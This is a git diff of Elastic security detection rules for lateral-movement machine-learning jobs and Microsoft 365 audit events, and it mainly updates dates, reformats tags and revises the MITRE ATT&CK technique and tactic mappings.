a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml index 04f5ad44500..2fba6b44191 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,13 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml index 8cc42195af1..3f4e83cc4ef 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -95,14 +95,13 @@ The detection of unusual remote file extensions leverages machine learning to id - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml index 027b7598adf..cf9b04d1252 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml index e511ab60262..1534efbce1e 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -95,14 +95,18 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml index d5bcf1bf496..39d87498cf6 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -94,14 +94,18 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml index d66e8ddd4dc..009b8ed2300 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -52,13 +52,7 @@ The Lateral Movement Detection integration detects lateral movement activity by - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Lateral Movement Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Use Case: Lateral Movement Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Exfiltration", "Tactic: Lateral Movement", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -97,14 +91,26 @@ Remote file transfer technologies facilitate data sharing across networks, essen - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml index be5de02f9db..f6ba1598c0b 100644 --- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml +++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml index e79eaca74da..ba63cde5f17 100644 --- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml +++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,19 +67,7 @@ references = [ risk_score = 47 rule_id = "0e524fa6-eed3-11ef-82b4-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Domain: Storage", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Storage", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: SharePoint", "Data Source: OneDrive", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -146,11 +134,3 @@ reference = "https://attack.mitre.org/techniques/T1530/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index f2e5eb1098f..517692da649 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,16 +62,7 @@ references = [ risk_score = 47 rule_id = "491651da-125b-11f1-af7d-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,31 +77,23 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index bcad5515b25..1b66c64fc1b 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,15 +50,7 @@ references = [ risk_score = 73 rule_id = "fcd2e4be-6ec4-482f-9222-6245367cd738" severity = "high" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -75,48 +67,31 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index d9d60e52102..9ee8b45d02c 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/10" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -127,29 +127,18 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" -[[rule.threat.technique.subtechnique]] -id = "T1110.004" -name = "Credential Stuffing" -reference = "https://attack.mitre.org/techniques/T1110/004/" - - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 692780a6416..0dc0777f315 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml +++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -188,48 +188,18 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 8574d32b915..943ff042f2e 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,11 +80,16 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index 1a63debc029..df05815d262 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://twitter.com/misconfig/status/1476144066807140355"] risk_score = 47 rule_id = "675239ea-c1bc-4467-a6d3-b9e2cc7f676d" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Tactic: Initial Access", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -75,23 +75,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 9b65cad7179..1fce09f533f 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index aeb5c15781c..6fb8a45115b 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml index 42f4af5cf54..0ba6cba943d 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index 7b81c5b2bd0..e6ea0aaf6ec 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -107,17 +107,13 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 98575d9075a..51150629c75 100644 --- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,13 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index a83611522d5..9c9c726a77e 100644 --- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,14 +78,13 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml index 1e70dfb7fd2..ea4d8372529 100644 --- a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml +++ b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,16 +52,7 @@ references = ["https://cloud.google.com/blog/topics/threat-intelligence/expansio risk_score = 21 rule_id = "4f2654e4-125b-11f1-af7d-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,35 +92,18 @@ web where event.dataset == "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1619" -name = "Cloud Storage Object Discovery" -reference = "https://attack.mitre.org/techniques/T1619/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml index cc943708bc7..d2d87fd2d44 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = [ risk_score = 47 rule_id = "ff4dd44a-0ac6-44c4-8609-3f81bc820f02" severity = "medium" -tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -78,14 +78,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] 